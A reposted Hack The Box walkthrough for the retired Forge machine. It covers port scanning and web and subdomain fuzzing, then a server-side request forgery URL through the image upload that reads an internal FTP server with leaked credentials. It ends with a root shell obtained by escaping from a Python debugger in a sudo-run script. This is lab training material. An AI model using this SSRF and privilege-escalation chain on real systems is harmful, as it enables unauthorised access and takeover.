Forge: Hack The Box Walkthrough
source link: https://hackso.me/forge-htb-walkthrough/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
This post documents the complete walkthrough of Forge, a retired vulnerable VM created by NoobHacker9999, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
On this post
Background
Forge is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
masscan -e tun0 -p1-65535,U:1-65535 10.10.11.111 --rate=2000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-09-14 02:39:05 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.11.111
Discovered open port 22/tcp on 10.10.11.111
This is a shit-show. Let’s do one better with nmap
scanning the discovered ports to establish their services.
nmap -n -v -Pn -p22,80 -A --reason 10.10.11.111 -oN nmap.txt
...
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
| 256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_ 256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://forge.htb
I’d better map forge.htb
to 10.10.11.111
in /etc/hosts
. This is what the site looks like.
Directory/File Enumeration
Let’s see what wfuzz
and SecLists give.
wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 20 --hc 404 http://forge.htb/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://forge.htb/FUZZ
Total requests: 38267
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000141: 200 32 L 58 W 929 Ch "upload"
000000112: 301 3 L 24 W 224 Ch "uploads"
000000265: 301 9 L 28 W 307 Ch "static"
000000391: 200 71 L 92 W 2050 Ch "."
000004191: 403 9 L 28 W 274 Ch "server-status"
Total time: 0
Processed Requests: 38267
Filtered Requests: 38262
Requests/sec.: 0
Subdomain Enumeration
Nothing much. Maybe we’ll have better luck with subdomains enumeration.
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 20 --hc 302 -H "Host: FUZZ.forge.htb" http://10.10.11.111
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.11.111/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000024: 200 1 L 4 W 27 Ch "admin"
Total time: 0
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 0
I’d better include admin.forge.htb
into /etc/hosts
as well. This is what I see when I browse to http://admin.forge.htb
.
Let’s keep this in view while we investigate forge.htb
.
Upload
There’s a link in forge.htb
for us to upload an image.
Turns out that “Upload from url” uses Python Requests to retrieve or download from the URL. Check this out.
Let’s see if we can retrieve admin.forge.htb
using this.
OK. We need the protocol.
OK. What about http://Admin.Forge.Htb
?
It works!
Using this method, let’s retrieve the HTML source of /announcements
and /upload
.
<!DOCTYPE html>
<html>
<head>
<title>Announcements</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a></h1>
</nav>
</header>
<br><br><br>
<ul>
<li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
<li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
<li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=<url>.</li>
</ul>
</body>
</html>
And /upload.
<!DOCTYPE html>
<html>
<head>
<title>Upload an image</title>
</head>
<body onload="show_upload_local_file()">
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<link rel="stylesheet" type="text/css" href="/static/css/upload.css">
<script type="text/javascript" src="/static/js/main.js"></script>
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a></h1>
</nav>
</header>
<center>
<br><br>
<div id="content">
<h2 onclick="show_upload_local_file()">
Upload local file
</h2>
<h2 onclick="show_upload_remote_file()">
Upload from url
</h2>
<div id="form-div">
</div>
</div>
</center>
<br>
<br>
</body>
</html>
Upload, Improved
We are told from the announcement that that an internal FTP server is set up and credentials (user:heightofsecurity123!
) are provided. We are also told that /upload
now supports the FTP protocol and u
parameter for scripting.
Armed with the credentials, we can supply the following URL to the “Upload from url” link:
http://Admin.Forge.Htb/upload?u=ftp://user:heightofsecurity123!@0/
0
refers to localhost
in Linux.
Foothold
That looks like the home directory of user
! Maybe we can read user’s SSH private key?
Awesome. Now we can log in to user
’s account.
We already know that user.txt
is in user’s home directory.
Privilege Escalation
During enumeration of user
’s account, I notice user
is able to sudo
the following.
Let’s check out what’s in /opt/remote-manage.py
.
remote_manage.py
will be listening at a random port and if an exception is encountered, Python Debugger will be activated. Python Debugger offers REPL type of interface to the Python interpreter. We can escape to shell with it and because remote_manage.py
is executed as root
through sudo
, we have a root
shell.
Getting root.txt
with a root
shell is a breeze.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK